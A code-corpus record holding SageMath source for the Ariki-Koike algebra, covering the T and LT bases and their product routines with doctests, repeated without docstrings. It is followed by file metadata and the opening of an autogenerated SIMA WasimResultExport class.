sage: T1 * T.L(3) * T2 * T1 * T0 - T1 * (T.L(3) * T2 * T1 * T0)
0
sage: T = algebras.ArikiKoike(3, 3).T()
sage: x = T.T(0) * T.T(1)
sage: (x*x)*x == x*(x*x)
True
sage: T = algebras.ArikiKoike(3, 4).T()
sage: L1 = T.L(1)
sage: L2 = T.L(2)
sage: (L2 * L1^2) * L2 == L2 * (L1^2 * L2)
True
sage: T1 = T.T(1)
sage: (T1 * L1^2) * T1 * L1 * L1 == (T1 * L1^2) * T1 * L1^2
True
"""
# We represent T_i for i > 0 as S_i in comments to avoid confusion.
# Product is of the form t1*s1 * t2*s2: separate the T's and permutations.
t1, s1 = m1
t2, s2 = m2
one = self.base_ring().one()
q = self._q
qm1 = q - one
# We first handle the case when s1 == 1
if s1 == self._one_perm:
if t1 == self._zero_tuple:
# Multiplying 1 * m2
return self._from_dict({m2: one}, remove_zeros=False)
if t2 == self._zero_tuple:
return self._from_dict({(t1, s2): one}, remove_zeros=False)
k1 = max(k for k,a in enumerate(t1) if a != 0)
k2 = min(k for k,a in enumerate(t2) if a != 0)
if k1 < k2:
T = list(t1)
for k in range(k2, len(t2)):
T[k] = t2[k]
return self._from_dict({(tuple(T), s2): one}, remove_zeros=False)
# This is the most recursive part of the product
M = self._product_TT(k1, t1[k1], k2, t2[k2])
t1 = list(t1)
t2 = list(t2)
t1[k1] = 0
t2[k2] = 0
L = self._from_dict({(tuple(t1), self._one_perm): one}, remove_zeros=False)
R = self._from_dict({(tuple(t2), s2): one}, remove_zeros=False)
return L * M * R
# The current product of T's and the type A Hecke algebra
tprod = [( [(k, a) for k, a in enumerate(t2) if a != 0], {s2: one} )]
# s1 through t2
for i in reversed(s1.reduced_word()):
new_t = []
for index in range(len(tprod)):
j = i
T, sprod = tprod[index]
absorbed = False
for ind in range(len(T)):
k, a = T[ind]
# -1 from i since k is 0-based but i is 1-based
if j < k:
j += 1
elif j == k:
absorbed = True
# Quadratic relation: S_k^2 = (q - 1) S_k + q
# So S_{k-1} T_{k,a} = (q-1) T_{k,a} + q T_{k-1,a}
# Make a copy of T since we need to mutate it
new_t.append((list(T), {s: q * sprod[s] for s in sprod}))
new_t[-1][0][ind] = (k-1, a)
for s in sprod:
sprod[s] *= qm1
break
elif j == k + 1:
absorbed = True
T[ind] = (k+1, a)
break
# elif j > k: pass
if absorbed:
# We do not need to update tprod[index] because we
# have mutated that pair of objects (T, sprod).
continue
# Do the usual Hecke product of S_j * S
temp = {} # start from 0
for p in sprod:
c = sprod[p]
# We have to flip the side due to Sage's
# convention for multiplying permutations
pj = p.apply_simple_reflection(j, side="left")
if p.has_descent(j, side="left"):
iaxpy(1, {p: c * qm1, pj: c * self._q}, temp)
else:
iaxpy(1, {pj: c}, temp)
tprod[index] = (T, temp)
tprod.extend(new_t)
# Compute t1 * T * sprod
def compute(T, sprod):
if not T: # T=1, so just do t1 * sprod, each of which is in order
return self._from_dict({(t1, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
s_elt = self._from_dict({(self._zero_tuple, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
# Break T into basis vectors as much as possible to best take
# advantage of the caching
cur = list(t1)
product = [cur]
if t1 != self._zero_tuple:
K = max(k for k, a in enumerate(t1) if a != 0)
else:
K = -1
T.reverse() # reverse the list so we can pop off the front
while T:
k, a = T.pop()
if k > K:
cur[k] = a
else:
cur = list(self._zero_tuple)
cur[k] = a
product.append(cur)
K = k
return self.prod(self._from_dict({(tuple(p), self._one_perm): one},
remove_zeros=False, coerce=False)
for p in product) * s_elt
return self.sum(compute(T, sprod) for T, sprod in tprod)
@lazy_attribute
def _T0_polynomial(self):
r"""
Return `p` such that `T0^{r-1} - p = \prod_{i=0}^{r-1} (T_0 - u_i)`.
OUTPUT:
A ``dict`` representing the polynomial `p`.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 2).T()
sage: T._T0_polynomial
((u0 + u1 + u2 + u3))*DUMMY^3
+ ((-u0*u1 - u0*u2 - u1*u2 - u0*u3 - u1*u3 - u2*u3))*DUMMY^2
+ ((u0*u1*u2 + u0*u1*u3 + u0*u2*u3 + u1*u2*u3))*DUMMY
- u0*u1*u2*u3
"""
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
# Remove the highest power
return -prod(z - val for val in self._u).truncate(self._r)
def _reduced_T0_power(self, exp):
r"""
Return the element `T_0` to the power ``exp`` in terms
of `T_0^k` for `k < r`.
EXAMPLES::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T._reduced_T0_power(1)
1
sage: T._reduced_T0_power(2)
((u0 + u1))*DUMMY - u0*u1
sage: T._reduced_T0_power(3)
((u0^2 + u0*u1 + u1^2))*DUMMY + (-u0^2*u1 - u0*u1^2)
sage: T._reduced_T0_power(4)
((u0^3 + u0^2*u1 + u0*u1^2 + u1^3))*DUMMY
+ (-u0^3*u1 - u0^2*u1^2 - u0*u1^3)
sage: T._reduced_T0_power(5)
((u0^4 + u0^3*u1 + u0^2*u1^2 + u0*u1^3 + u1^4))*DUMMY
+ (-u0^4*u1 - u0^3*u1^2 - u0^2*u1^3 - u0*u1^4)
"""
if exp < self._r:
return self.base_ring().one()
PR = self._T0_polynomial.parent()
z = PR.gen()
cur = z ** exp
while cur.degree() >= self._r:
cur = (PR.sum(coeff * self._T0_polynomial * z**e
for e, coeff in enumerate(cur.list()[self._r:]))
+ cur.truncate(self._r))
return cur
@cached_method
def _product_TT(self, kp, a, k, b):
r"""
Return the product `T_{k',a} T_{k,b}` with `k' \geq k` in terms
of the basis elements of ``self``.
From Lemma 2.3 of [BM1997]_, we have
.. MATH::
T_{k',a} T_{k,b} = T_{k-1,b} T_{k',a} T_1
+ (q - 1) \sum_{i=1}^b T_{k-1,a+b-i} T_{k',i}
- T_{k-1,i} T_{k',a+b-i}.
INPUT:
- ``kp``, ``k`` -- 0-based indices
- ``a``, ``b`` -- the exponents of the `T_0` generator
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._product_TT(1, 0, 0, 1)
T[1,0]
sage: T._product_TT(1, 1, 0, 1)
T[1,0,0]
sage: T._product_TT(1, 2, 0, 1)
T[1,0,0,0]
sage: T._product_TT(1, 3, 0, 1)
(-u0*u1*u2*u3)*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[1,0,0]
+ ((u0+u1+u2+u3))*T[1,0,0,0]
sage: T._product_TT(1, 2, 0, 2)
(-u0*u1*u2*u3)*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[1,0,0]
+ ((u0+u1+u2+u3))*T[1,0,0,0]
sage: T._product_TT(2, 1, 0, 3)
(-u0*u1*u2*u3)*T[2,1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3))*T[2,1,0]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3))*T[2,1,0,0]
+ ((u0+u1+u2+u3))*T[2,1,0,0,0]
TESTS::
sage: H = algebras.ArikiKoike(3, 4)
sage: T = H.T()
sage: T._product_TT(1, 2, 1, 2)
(-u0*u1*u2+u0*u1*u2*q)*T[1,0]
+ (u0*u1*u2-u0*u1*u2*q)*T[0,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[0,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[0,0,1,0]
+ T[0,0,1,0,0,1]
sage: T._product_TT(2,2,2,2)
(-u0*u1*u2+u0*u1*u2*q)*T[2,1,0,2]
+ (u0*u1*u2-u0*u1*u2*q)*T[1,0,2,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[1,0,2,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[1,0,0,2,1,0]
+ T[1,0,0,2,1,0,0,1]
sage: T._product_TT(3,2,3,2)
(-u0*u1*u2+u0*u1*u2*q)*T[3,2,1,0,3,2]
+ (u0*u1*u2-u0*u1*u2*q)*T[2,1,0,3,2,1]
+ ((u0+u1+u2)+(-u0-u1-u2)*q)*T[2,1,0,3,2,1,0,0]
+ ((-u0-u1-u2)+(u0+u1+u2)*q)*T[2,1,0,0,3,2,1,0]
+ T[2,1,0,0,3,2,1,0,0,1]
"""
# Quadratic relation: S_i^2 - (q - 1) S_i - q == 0
# [BM1997]_: S_i^2 - (q_1 + q_2) S_i + q_1 q_2 == 0
# Implies q_1 = q, q_2 = -1
one = self.base_ring().one()
# Case T_{k',a} T_0^b = T_{k',a+b}
if k == 0:
if a + b < self._r:
T = list(self._zero_tuple)
T[kp] = a + b
return self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
def key(exp):
if exp > 0 or kp == 0:
T = list(self._zero_tuple)
T[kp] = exp
return (tuple(T), self._one_perm)
# Note that kp is 0-based, but our 0-index in the T portion
# is the power of T_0
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
return (self._zero_tuple, perm)
p = self._reduced_T0_power(a + b)
zero = self.base_ring().zero()
return self._from_dict({key(exp): coeff
for exp, coeff in enumerate(p)
if coeff != zero},
remove_zeros=False, coerce=False)
# Otherwise k > 0
assert kp >= k
s1 = self._Pn.simple_reflection(1)
qm1 = self._q - one
T = list(self._zero_tuple)
T[k-1] = b
T[kp] = a
ret = {(tuple(T), s1): one}
zero = self.base_ring().zero()
def T_index(exp, ind, i, indp):
T = list(self._zero_tuple)
T[ind] = exp
T[indp] = i
return tuple(T)
for i in range(1, b+1):
if a + b - i == i:
continue
if a + b - i < self._r:
T[k-1] = a + b - i
T[kp] = i
m = (tuple(T), self._one_perm)
T[k-1] = i
T[kp] = a + b - i
mp = (tuple(T), self._one_perm)
iaxpy(1, {m: qm1, mp: -qm1}, ret)
else:
p = self._reduced_T0_power(a + b - i)
temp = {(T_index(exp, k-1, i, kp), self._one_perm): qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero and k > 1:
# We need to add back in the permutation for the "T_{k-1,0}"
# in the reduction from T_{k-1,a+b-i}
perm = self._Pn.one()
for j in range(2, k+1): # Recall k is 0-based, we add 1 back from Lemma 2.3(a)
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, k-1, i, kp)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
temp = {(T_index(exp, kp, i, k-1), self._one_perm): -qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero:
# We need to add back in the permutation for the "T_{k',0}"
# in the reduction from T_{k',a+b-i}
perm = self._Pn.one()
for j in range(1, kp+1): # Recall kp is 0-based
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, kp, i, k-1)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
return self._from_dict(ret, remove_zeros=False)
| 38.876914
| 115
| 0.442048
|
from sage.misc.cachefunc import cached_method
from sage.misc.lazy_attribute import lazy_attribute
from sage.misc.misc_c import prod
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.algebras import Algebras
from sage.categories.rings import Rings
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.categories.cartesian_product import cartesian_product
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.polynomial.laurent_polynomial_ring import LaurentPolynomialRing
from sage.rings.integer_ring import ZZ
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.permutation import Permutations
from sage.sets.family import Family
from sage.data_structures.blas_dict import iaxpy
class _Basis(CombinatorialFreeModule, BindableClass):
def __init__(self, algebra, prefix='AK'):
self._r = algebra._r
self._n = algebra._n
self._q = algebra._q
self._u = algebra._u
self._zero_tuple = tuple([0] * self._n)
self._Pn = Permutations(self._n)
self._one_perm = self._Pn.one()
C = cartesian_product([range(self._r)] * self._n)
indices = cartesian_product([C, self._Pn])
CombinatorialFreeModule.__init__(self, algebra.base_ring(), indices,
prefix=prefix,
category=algebra._BasesCategory())
@cached_method
def one_basis(self):
return (self._zero_tuple, self._one_perm)
class ArikiKoikeAlgebra(Parent, UniqueRepresentation):
@staticmethod
def __classcall_private__(cls, r, n, q=None, u=None, R=None):
if u is None:
if q is not None:
R = q.parent()
if R is None:
R = PolynomialRing(ZZ, 'u', r)
u = R.gens()
if q is None:
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
u = PolynomialRing(ZZ, 'u', r).gens()
if q is None:
q = 'q'
else:
if not isinstance(u, (list,tuple)):
u = [u]*r
if R is None:
from sage.structure.element import get_coercion_model
cm = get_coercion_model()
if q is None:
R = cm.common_parent(*[val.parent() for val in u])
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
R = cm.common_parent(q.parent(), *[val.parent() for val in u])
elif q is None:
q = 'q'
u = [R(val) for val in u]
if R not in Rings().Commutative():
raise TypeError("base ring must be a commutative ring")
q = R(q)
u = tuple(u)
return super(ArikiKoikeAlgebra, cls).__classcall__(cls, r, n, q, u, R)
def __init__(self, r, n, q, u, R):
self._r = r
self._n = n
self._q = q
self._u = u
self._category = Algebras(R).FiniteDimensional().WithBasis()
Parent.__init__(self, base=R, category=self._category.WithRealizations())
T = self.T()
LT = self.LT()
T.module_morphism(LT._from_T_basis, codomain=LT).register_as_coercion()
LT.module_morphism(T._from_LT_basis, codomain=T).register_as_coercion()
def _repr_(self):
return "Ariki-Koike algebra of rank {} and order {} with q={} and u={} over {}".format(
self._r, self._n, self._q, self._u, self.base_ring())
def _latex_(self):
return "\\mathcal{H}_{%s,%s}(%s)"%(self._r, self._n, self._q)
def hecke_parameter(self):
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
return self._u
u = cyclotomic_parameters
def a_realization(self):
return self.LT()
class _BasesCategory(Category_realization_of_parent):
def __init__(self, base):
Category_realization_of_parent.__init__(self, base)
def super_categories(self):
return [Realizations(self.base()), self.base()._category]
def _repr_(self):
return "Category of bases of %s" % self.base()
class ParentMethods:
def _repr_(self):
return "%s in the %s-basis"%(self.realization_of(), self._realization_name())
def hecke_parameter(self):
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
return self._u
u = cyclotomic_parameters
@cached_method
def gens(self):
return tuple(self.algebra_generators())
def dimension(self):
from sage.arith.all import factorial
return self._r**self._n * factorial(self._n)
def some_elements(self):
G = self.algebra_generators()
elts = [self.an_element()] + list(G)
elts += [self.L(1)**2]
if self._n > 1:
elts += [self.L(2)**(self._r//2)]
return elts
class LT(_Basis):
def __init__(self, algebra):
_Basis.__init__(self, algebra, prefix='LT')
self._assign_names(self.algebra_generators().keys())
def _repr_term(self, m):
gen_str = lambda e: '' if e == 1 else '^%s'%e
lhs = '*'.join('L%s'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
rhs = 'T[{}]'.format(','.join(str(i) for i in redword))
if not lhs:
return rhs
return lhs + '*' + rhs
def _latex_term(self, m):
gen_str = lambda e: '' if e == 1 else '^{%s}'%e
lhs = ' '.join('L_{%s}'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
return lhs + ' ' + ' '.join("T_{%d}"%i for i in redword)
def _from_T_basis(self, t):
ret = self.one()
T = list(self._zero_tuple)
one = self.base_ring().one()
for i,k in enumerate(t[0]):
if k == 0:
continue
perm = self._Pn.prod(self._Pn.simple_reflection(j)
for j in range(1,i+1))
ret = ret * self._from_dict({(self._zero_tuple, perm): one},
remove_zeros=False, coerce=False)
T[0] = k
ret = ret * self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
return ret * self._from_dict({(self._zero_tuple, t[1]): one},
remove_zeros=False, coerce=False)
@cached_method
def algebra_generators(self):
d = {}
if self._r != 1:
for i in range(self._n):
r = list(self._zero_tuple)
r[i] = 1
d['L%s'%(i+1)] = self.monomial( (tuple(r), self._one_perm) )
G = self._Pn.group_generators()
for i in range(1, self._n):
d['T%s'%i] = self.monomial( (self._zero_tuple, G[i]) )
return Family(sorted(d), lambda i: d[i])
def T(self, i=None):
G = self.algebra_generators()
if i is None:
return [G['L1']] + [G['T%s'%j] for j in range(1, self._n)]
if i == 0:
return G['L1']
return G['T%s'%i]
def L(self, i=None):
G = self.algebra_generators()
if i is None:
if self._r == 1:
return [self._Li_power(j, 1) for j in range(1, self._n+1)]
return [G['L%s'%j] for j in range(1, self._n+1)]
if self._r == 1:
return self._Li_power(i, 1)
return G['L%s'%i]
@cached_method
def product_on_basis(self, m1, m2):
L1,T1 = m1
L2,T2 = m2
if sum(L2) == 0:
# Compute and return the product of T1 and T2, whilst fixing L
return self._from_dict(self._product_LTwTv(L1, T1, T2),
remove_zeros=False, coerce=False)
# If T1 is trivial then we just have L1*L2*T2 we only need to rewrite
# all of the "large" powers that appear in L1*L2. Unfortunately, this
# will almost certainly introduce more T_w's and it will be recursive
if T1 == self._one_perm:
Lbig = list(self._zero_tuple)
Lsmall = list(self._zero_tuple)
for i in range(self._n):
s = L1[i] + L2[i]
if s < self._r:
Lsmall[i] = s
else:
Lbig[i] = s
if tuple(Lbig) == self._zero_tuple:
# if no big powers we only need to combine Lsmall and T2
return self.monomial((tuple(Lsmall), T2))
# The l variables all commute, so we can multiply them in any order
# that we like. For improved efficiency, however, we move the Ls to
# the left as soon as we can. For efficiency, we multiply the
# "big" powers in the order L_n^N L_{n-1}^N...L_1^N as this
# way we have to expand few powers the of the Lk's later.
return (self.monomial((tuple(Lsmall), self._one_perm))
* prod(self._Li_power(i+1, Lbig[i])
for i in reversed(range(self._n)) if Lbig[i] > 0)
* self.monomial((self._zero_tuple, T2))
)
return ( self.monomial((L1, self._one_perm))
* self._product_Tw_L(T1, L2)
* self.monomial((self._zero_tuple, T2)) )
def _product_LTwTv(self, L, w, v):
ret = {v: self.base_ring().one()}
qm1 = self._q - self.base_ring().one()
for i in reversed(w.reduced_word()):
temp = {}
for p in ret:
c = ret[p]
# convention for multiplying permutations
pi = p.apply_simple_reflection(i, side="left")
if p.has_descent(i, side="left"):
iaxpy(1, {p: c * qm1, pi: c * self._q}, temp)
else:
iaxpy(1, {pi: c}, temp)
ret = temp
return {(L, p): ret[p] for p in ret}
def _product_Tw_L(self, w, L):
# initialize wL to L: this is what we will eventually return
wL = {(L, self._one_perm): self.base_ring().one()}
q = self._q
one = q.parent().one()
for i in w.reduced_word()[::-1]:
iL = {} # this will become T_i * L, written in standard form
for lv in wL:
c = wL[lv]
L = list(lv[0]) # make a copy
v = lv[1]
a, b = L[i-1], L[i]
L[i-1], L[i] = L[i], L[i-1] # swap L_i=L[i-1] and L_{i+1}=L[i]
# the term L_1^{a_1} ... L_i^{a_{i+1}} L_{i+1}^{a_i} ... L_n^{a_n} T_i T_v
# always appears
iaxpy(c, self._product_LTwTv(tuple(L), self._Pn.simple_reflections()[i], v), iL) # need T_i*T_v
if a < b:
Ls = [ list(L) for k in range(b-a) ] # make copies of L
for k in range(b-a):
Ls[k][i-1] = a + k
Ls[k][i] = b - k
c *= (q - one)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
elif a > b:
Ls = [ list(L) for k in range(a-b) ] # make copies of L
for k in range(a-b):
Ls[k][i-1] = b + k
Ls[k][i] = a - k
c *= (one - q)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
wL = iL # replace wL with iL and repeat
return self._from_dict(wL, remove_zeros=False, coerce=False)
@cached_method
def _Li_power(self, i, m):
# shorthand for returning a tuple of the form (0,...,a,b,...,0) with a,b
# in the (i-1)th and i-th positions, respectively
def Ltuple(a, b):
return tuple([b if j == i else a if j == i-1 else 0
for j in range(1,self._n+1)])
# return "small" powers of the generators without change
if m < self._r:
return self.monomial( (Ltuple(0, m), self._one_perm) )
if i > 1:
si = self._Pn.simple_reflections()[i-1]
qsum = self.base_ring().one() - self._q**-1
# by calling _Li_power we avoid infinite recursion here
return ( self.sum_of_terms( ((Ltuple(c, m-c), si), qsum) for c in range(1, m) )
+ self._q**-1 * self.T(i-1) * self._Li_power(i-1, m) * self.T(i-1) )
# now left with the case i = 1 and m >= r
if m > self._r:
return self.monomial((Ltuple(0, 1), self._one_perm)) * self._Li_power(i,m-1)
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
p = list(prod(z - val for val in self._u))#[:-1]
p.pop() # remove the highest power
zero = self.base_ring().zero()
return self._from_dict({(Ltuple(0, exp), self._one_perm): -coeff
for exp,coeff in enumerate(p) if coeff != zero},
remove_zeros=False, coerce=False)
@cached_method
def inverse_T(self, i):
c = ~self._q - self.base_ring().one()
m = self.T(i).leading_support()
return self._from_dict({m: ~self._q, self.one_basis(): c})
class Element(CombinatorialFreeModule.Element):
def inverse(self):
if len(self) != 1:
raise NotImplementedError("inverse only implemented for monomials")
l,w = self.support_of_term()
if sum(l) != 0:
raise NotImplementedError("inverse only implemented for monomials in T variables")
H = self.parent()
return ~self[l,w] * H.prod(H.inverse_T(i) for i in reversed(w.reduced_word()))
__invert__ = inverse
class T(_Basis):
def __init__(self, algebra):
_Basis.__init__(self, algebra, prefix='T')
self._assign_names(['T%s'%i for i in range(self._n)])
def _repr_term(self, t):
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return (self._print_options['prefix']
+ '[%s]'%','.join('%d'%i for i in redword))
def _latex_term(self, t):
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return ''.join("%s_{%d}"%(self._print_options['prefix'], i)
for i in redword)
def _from_LT_basis(self, m):
ret = self.prod(self.L(i+1)**k for i,k in enumerate(m[0]))
return ret * self.monomial( (self._zero_tuple, m[1]) )
@cached_method
def algebra_generators(self):
start = 1 if self._r == 1 else 0
return Family(list(range(start, self._n)), self.T)
def T(self, i=None):
if i is None:
return [self.T(j) for j in range(self._n)]
if i == 0:
return self.monomial( ((1,) + self._zero_tuple[1:], self._one_perm) )
s = self._Pn.simple_reflections()
return self.monomial( (self._zero_tuple, s[i]) )
@cached_method
def L(self, i=None):
if i is None:
return [self.L(j) for j in range(1, self._n+1)]
if i == 1:
if self._r == 1:
return self.from_base_ring(self._u[0])
else:
return self.T(0)
T = self.T()
return self._q**-1 * T[i-1] * self.L(i-1) * T[i-1]
@cached_method
def product_on_basis(self, m1, m2):
# We represent T_i for i > 0 as S_i in comments to avoid confusion.
# Product is of the form t1*s1 * t2*s2: separate the T's and permutations.
t1, s1 = m1
t2, s2 = m2
one = self.base_ring().one()
q = self._q
qm1 = q - one
if s1 == self._one_perm:
if t1 == self._zero_tuple:
return self._from_dict({m2: one}, remove_zeros=False)
if t2 == self._zero_tuple:
return self._from_dict({(t1, s2): one}, remove_zeros=False)
k1 = max(k for k,a in enumerate(t1) if a != 0)
k2 = min(k for k,a in enumerate(t2) if a != 0)
if k1 < k2:
T = list(t1)
for k in range(k2, len(t2)):
T[k] = t2[k]
return self._from_dict({(tuple(T), s2): one}, remove_zeros=False)
M = self._product_TT(k1, t1[k1], k2, t2[k2])
t1 = list(t1)
t2 = list(t2)
t1[k1] = 0
t2[k2] = 0
L = self._from_dict({(tuple(t1), self._one_perm): one}, remove_zeros=False)
R = self._from_dict({(tuple(t2), s2): one}, remove_zeros=False)
return L * M * R
tprod = [( [(k, a) for k, a in enumerate(t2) if a != 0], {s2: one} )]
# s1 through t2
for i in reversed(s1.reduced_word()):
new_t = []
for index in range(len(tprod)):
j = i
T, sprod = tprod[index]
absorbed = False
for ind in range(len(T)):
k, a = T[ind]
# -1 from i since k is 0-based but i is 1-based
if j < k:
j += 1
elif j == k:
absorbed = True
# Quadratic relation: S_k^2 = (q - 1) S_k + q
# So S_{k-1} T_{k,a} = (q-1) T_{k,a} + q T_{k-1,a}
# Make a copy of T since we need to mutate it
new_t.append((list(T), {s: q * sprod[s] for s in sprod}))
new_t[-1][0][ind] = (k-1, a)
for s in sprod:
sprod[s] *= qm1
break
elif j == k + 1:
absorbed = True
T[ind] = (k+1, a)
break
# elif j > k: pass
if absorbed:
# We do not need to update tprod[index] because we
# have mutated that pair of objects (T, sprod).
continue
# Do the usual Hecke product of S_j * S
temp = {} # start from 0
for p in sprod:
c = sprod[p]
# We have to flip the side due to Sage's
pj = p.apply_simple_reflection(j, side="left")
if p.has_descent(j, side="left"):
iaxpy(1, {p: c * qm1, pj: c * self._q}, temp)
else:
iaxpy(1, {pj: c}, temp)
tprod[index] = (T, temp)
tprod.extend(new_t)
def compute(T, sprod):
if not T:
return self._from_dict({(t1, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
s_elt = self._from_dict({(self._zero_tuple, s): sprod[s] for s in sprod},
remove_zeros=False, coerce=False)
cur = list(t1)
product = [cur]
if t1 != self._zero_tuple:
K = max(k for k, a in enumerate(t1) if a != 0)
else:
K = -1
T.reverse()
while T:
k, a = T.pop()
if k > K:
cur[k] = a
else:
cur = list(self._zero_tuple)
cur[k] = a
product.append(cur)
K = k
return self.prod(self._from_dict({(tuple(p), self._one_perm): one},
remove_zeros=False, coerce=False)
for p in product) * s_elt
return self.sum(compute(T, sprod) for T, sprod in tprod)
@lazy_attribute
def _T0_polynomial(self):
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
return -prod(z - val for val in self._u).truncate(self._r)
def _reduced_T0_power(self, exp):
if exp < self._r:
return self.base_ring().one()
PR = self._T0_polynomial.parent()
z = PR.gen()
cur = z ** exp
while cur.degree() >= self._r:
cur = (PR.sum(coeff * self._T0_polynomial * z**e
for e, coeff in enumerate(cur.list()[self._r:]))
+ cur.truncate(self._r))
return cur
@cached_method
def _product_TT(self, kp, a, k, b):
one = self.base_ring().one()
if k == 0:
if a + b < self._r:
T = list(self._zero_tuple)
T[kp] = a + b
return self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
def key(exp):
if exp > 0 or kp == 0:
T = list(self._zero_tuple)
T[kp] = exp
return (tuple(T), self._one_perm)
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
return (self._zero_tuple, perm)
p = self._reduced_T0_power(a + b)
zero = self.base_ring().zero()
return self._from_dict({key(exp): coeff
for exp, coeff in enumerate(p)
if coeff != zero},
remove_zeros=False, coerce=False)
assert kp >= k
s1 = self._Pn.simple_reflection(1)
qm1 = self._q - one
T = list(self._zero_tuple)
T[k-1] = b
T[kp] = a
ret = {(tuple(T), s1): one}
zero = self.base_ring().zero()
def T_index(exp, ind, i, indp):
T = list(self._zero_tuple)
T[ind] = exp
T[indp] = i
return tuple(T)
for i in range(1, b+1):
if a + b - i == i:
continue
if a + b - i < self._r:
T[k-1] = a + b - i
T[kp] = i
m = (tuple(T), self._one_perm)
T[k-1] = i
T[kp] = a + b - i
mp = (tuple(T), self._one_perm)
iaxpy(1, {m: qm1, mp: -qm1}, ret)
else:
p = self._reduced_T0_power(a + b - i)
temp = {(T_index(exp, k-1, i, kp), self._one_perm): qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero and k > 1:
perm = self._Pn.one()
for j in range(2, k+1):
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, k-1, i, kp)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
temp = {(T_index(exp, kp, i, k-1), self._one_perm): -qm1 * coeff
for exp, coeff in enumerate(p) if coeff != zero}
if p[0] != zero:
# in the reduction from T_{k',a+b-i}
perm = self._Pn.one()
for j in range(1, kp+1):
perm = perm.apply_simple_reflection_left(j)
tind = T_index(0, kp, i, k-1)
temp[(tind, perm)] = temp[(tind, self._one_perm)]
del temp[(tind, self._one_perm)]
iaxpy(1, temp, ret)
return self._from_dict(ret, remove_zeros=False)
| true
| true
|
1c4488741e7017b609ea544ddd3f3c1aae65f69f
| 3,703
|
py
|
Python
|
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/simo/wasimresultexport.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# This an autogenerated file
#
# Generated with WasimResultExport
from __future__ import annotations
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.wasimresultexport import WasimResultExportBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.bodyforcecomponentreference import BodyForceComponentReference
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from sima.simo.simobody import SIMOBody
class WasimResultExport(MOAO):
"""
Keyword arguments
-----------------
name : str
(default "")
description : str
(default "")
_id : str
(default "")
scriptableValues : List[ScriptableValue]
floaterBody : SIMOBody
pointForces : List[BodyForceComponentReference]
maxNumberOfWaveComponents : int
Limit the number of wave components exported to file(default 0)
"""
def __init__(self , name="", description="", _id="", maxNumberOfWaveComponents=0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
